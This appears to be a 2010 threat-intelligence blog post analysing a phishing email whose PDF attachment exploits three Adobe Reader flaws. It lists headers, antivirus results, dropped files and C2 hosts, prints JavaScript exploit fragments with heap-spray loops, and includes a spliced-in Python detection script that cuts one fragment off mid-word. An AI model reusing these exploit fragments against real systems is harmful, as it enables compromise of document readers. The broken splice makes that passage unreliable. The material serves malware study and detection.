Tuesday, August 3, 2010

Aug 3 CVE-2009-0927 + CVE-2009-4324 + CVE-2007-5659 Please confirm from 94255015@nccu.edu.tw 140.119.166.13



Download 350924123cbf1b126f4e38335ed6660d + dropped files as a password-protected archive (contact me if you need the password)





-----Original Message-----
From: 94255015 [mailto:94255015@nccu.edu.tw]
Sent: Tuesday, August 03, 2010 11:24 AM
To: xxxxxxxxx
Subject: Please confirm~


Dear xxxxxxxxxxxxxxxx:

I'm very sorry to bother you, but please to make sure you have attended the meetings, and to confirm the agenda is correct. Thank you very much!

Your sincerely,
Aaron

Headers
Received: (qmail 6491 invoked from network); 3 Aug 2010 15:08:01 -0000
Received: from alumni2.nccu.edu.tw (HELO alumni2.nccu.edu.tw) (140.119.166.13)
  by xxxxxxxxxxxx
Received: By OpenMail Mailer;Tue, 03 Aug 2010 23:24:24 +0800 (CST)
From: "94255015" <94255015@nccu.edu.tw>
Reply-To: 94255015@nccu.edu.tw
Subject: Please confirm~
Message-ID: <1280849064.24992.94255015@nccu.edu.tw>
To: "xxxxxxxxx
Date: Tue, 3 Aug 2010 23:24:24 +0800
MIME-Version: 1.0
Return-Path: 94255015@nccu.edu.tw
Content-Type: multipart/mixed; boundary="---=Z8PIZ9?YwlMVFpoZJ2WvJ=sMbD"
 
140.119.166.13
 Hostname:    alumni2.nccu.edu.tw
ISP:    MOEC
Organization:    National Chengchi University
Proxy:    None detected
Type:    Broadband
Country:    Taiwan


File name: conference_program.pdf
http://www.virustotal.com/file-scan/report.html?id=220a1b24e02c2757eccebb6827b4021d570b0f662dd1b0772c22c96b8f6b7c1d-1282772703
Submission date: 2010-08-25 21:45:03 (UTC)
Current status: 17/42 (40.5%)

Antivirus     Version     Last update     Result
Authentium     5.2.0.5     2010.08.25     PDF/Obfusc.G!Camelot
Avast     4.8.1351.0     2010.08.25     JS:Pdfka-gen
Avast5     5.0.594.0     2010.08.25     JS:Pdfka-gen
BitDefender     7.2     2010.08.25     Exploit.PDF-JS.Gen
ClamAV     0.96.2.0-git     2010.08.25     Heuristics.PDF.ObfuscatedNameObject
DrWeb     5.0.2.03300     2010.08.25     Exploit.PDF.1302
Emsisoft     5.0.0.37     2010.08.25     HTML.Malicious!IK
eSafe     7.0.17.0     2010.08.25     PDF.Exploit.4
F-Prot     4.6.1.107     2010.08.25     JS/ShellCode.S
F-Secure     9.0.15370.0     2010.08.25     Exploit.PDF-JS.Gen
GData     21     2010.08.25     Exploit.PDF-JS.Gen
Ikarus     T3.1.1.88.0     2010.08.25     HTML.Malicious
Kaspersky     7.0.0.125     2010.08.25     Exploit.JS.Pdfka.cri
nProtect     2010-08-25.02     2010.08.25     Exploit.PDF-Name.Gen
VBA32     3.12.14.0     2010.08.25     Exploit.JS.Pdfka.cri
Additional information
MD5: 350924123cbf1b126f4e38335ed6660d


CVE-2009-0927 + CVE-2009-4324 + CVE-2007-5659

____________________________________
CVE-2009-0927

for (i = 0; i < buffersize; i ++ ){
buffer[i] = unescape("%0a%0a%0a%0a");
}
var strtmp3 = "Collab.get" + "Icon(buffer+'_N.bundle');";
eval(strtmp3);
---------------------------------------------------------
CVE-2009-4324

for (i = 0; i < 200; i ++ )memory[i] = block + shellcode;
try {
this .media.newPlayer(null);
}
catch (e){
}
util.printd(String.fromCharCode(2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570,
2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570
, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570), new Date());
}
----------------------------------------------------------------------
CVE-2007-5659

if (app.viewerVersion >= 6.0){
this .collabStore = Collab.collectEmailInfo({
subj : "", msg : plin
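
The three snippets above each hinge on one Acrobat JavaScript API call (Collab.getIcon, media.newPlayer together with util.printd, Collab.collectEmailInfo), and the first one hides its API name by splitting the string and passing it through eval. As an added example, not code from the original post, here is a small Python triage script that undoes that string splitting and then looks for those calls in JavaScript already extracted from a PDF (by whatever parser or service you use; the Wepawet link below is one). The sample JavaScript and the benign control inside it are constructed to mirror the snippets, and the rule names, regexes and spray indicators are this example's own assumptions, meant as triage signals rather than a verdict.

```python
import re

# Constructed sample, not the post's extracted JavaScript: a condensed fragment that
# mirrors the three snippets quoted above (split string + eval for Collab.getIcon,
# media.newPlayer(null) with util.printd, and Collab.collectEmailInfo).
SAMPLE_JS = r'''
for (i = 0; i < buffersize; i ++ ){ buffer[i] = unescape("%0a%0a%0a%0a"); }
var strtmp3 = "Collab.get" + "Icon(buffer+'_N.bundle');";
eval(strtmp3);
for (i = 0; i < 200; i ++ )memory[i] = block + shellcode;
try { this .media.newPlayer(null); } catch (e){ }
util.printd(String.fromCharCode(2570, 2570, 2570, 2570), new Date());
if (app.viewerVersion >= 6.0){ this .collabStore = Collab.collectEmailInfo({ subj : "", msg : plin }); }
'''

# Constructed benign form-script fragment used as a negative control.
BENIGN_JS = r'''
var f = this.getField("total"); f.value = this.getField("qty").value * 2;
app.alert("Form updated");
'''

# One rule per CVE on the page: every regex in the list must match for the rule to fire.
# The CVE-to-API mapping comes from the snippets above; the regexes are this example's own.
RULES = [
    ("CVE-2009-0927", [r"Collab\.getIcon\s*\("]),
    ("CVE-2009-4324", [r"media\.newPlayer\s*\(\s*null\s*\)", r"util\.printd\s*\("]),
    ("CVE-2007-5659", [r"Collab\.collectEmailInfo\s*\("]),
]

# Heap-spray style preparation seen in the snippets, reported separately because it is
# a generic indicator rather than a vulnerability trigger.
SPRAY_PATTERNS = [
    ("unescape fill loop", r"""unescape\s*\(\s*["'](?:%[0-9a-fA-F]{2}|%u[0-9a-fA-F]{4})+["']"""),
    ("array fill with shellcode", r"\[\s*i\s*\]\s*=\s*\w+\s*\+\s*shellcode"),
]

_SPLIT_LITERAL = re.compile(r"""(["'])\s*\+\s*\1""")   # matches  " + "  or  ' + '
_THIS_DOT = re.compile(r"this\s+\.")


def normalize(js: str) -> str:
    """Undo the cheap obfuscation in the samples so API names are searchable.

    "Collab.get" + "Icon(" becomes "Collab.getIcon(", and the odd `this .media`
    spacing becomes `this.media`. Repeats until no split literal remains.
    """
    text = js
    while True:
        joined = _SPLIT_LITERAL.sub("", text)
        if joined == text:
            break
        text = joined
    return _THIS_DOT.sub("this.", text)


def scan(js: str) -> dict:
    """Return the CVE rules and spray indicators that match the (normalized) script."""
    text = normalize(js)
    cves = [cve for cve, patterns in RULES if all(re.search(p, text) for p in patterns)]
    spray = [name for name, pattern in SPRAY_PATTERNS if re.search(pattern, text)]
    return {"cves": cves, "spray": spray}


if __name__ == "__main__":
    for label, js in (("sample", SAMPLE_JS), ("benign", BENIGN_JS)):
        print(label, scan(js))
```

A hit on Collab.getIcon or Collab.collectEmailInfo alone is not proof of exploitation (legitimate collaboration scripts exist), which is why the script reports the spray indicators next to the CVE rules: the combination of a fill loop, a split-and-eval API name and one of these calls is what makes a document worth detonating, as the post did below.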

Wepawet
http://wepawet.iseclab.org/view.php?hash=350924123cbf1b126f4e38335ed6660d&type=js 

 ---------------------

Run on Windows XP SP2 with Adobe Reader 9.11

Created files
%userprofile%\Application Data\diskchk.exe  379E0B3E2C4778075511C4C1E62C0C65
%userprofile%\Local Settings\Temp\2.tmp 
C:\a.pdf 

a.pdf

File name: diskchk.exe
http://www.virustotal.com/file-scan/report.html?id=5ab0bc8ef4f276e2b8a8fa989aa8e35947f1f1a2694f786ab02d4d4b7eeab2d6-1282823469
Submission date: 2010-08-26 11:51:09 (UTC)
Result: 10/40 (25.0%)

Antivirus    Version    Last update    Result
AntiVir    8.2.4.46    2010.08.26    TR/Crypt.ZPACK.Gen
Avast    4.8.1351.0    2010.08.26    Win32:Malware-gen
Avast5    5.0.594.0    2010.08.26    Win32:Malware-gen
AVG    9.0.0.851    2010.08.26    BackDoor.Generic12.BUOQ
BitDefender    7.2    2010.08.26    Gen:Trojan.Heur.RP.bu0@a86LzSfb
CAT-QuickHeal    11.00    2010.08.24    (Suspicious) - DNAScan
F-Secure    9.0.15370.0    2010.08.26    Gen:Trojan.Heur.RP.bu0@a86LzSfb
GData    21    2010.08.26    Gen:Trojan.Heur.RP.bu0@a86LzSfb
nProtect    2010-08-26.01    2010.08.26    Trojan/W32.Agent.28160.MA
Sophos    4.56.0    2010.08.26    Troj/FkIntel-A
Additional information
MD5: 379e0b3e2c4778075511c4c1e62c0c65


Anubis report
http://anubis.iseclab.org/?action=result&task_id=1f9a7a78ebc252b74a1362b81134726d7




DNS 
audnted.flinkup.org 220.246.73.187
facecache.mypicture.info 220.246.73.187
microinfo.3utilities.com 255.255.255.255

220.246.73.187
http://www.robtex.com/ip/220.246.73.187.html#whois
Hostname:    187.73.246.220.static.netvigator.com
ISP:    PCCW Limited
Organization:    PCCW Limited
Type:    Broadband
Assignment:    Dynamic IP
Country:    Hong Kong
City:    Kings Park
http://www.robtex.com/dns/187.73.246.220.static.netvigator.com.html#graph


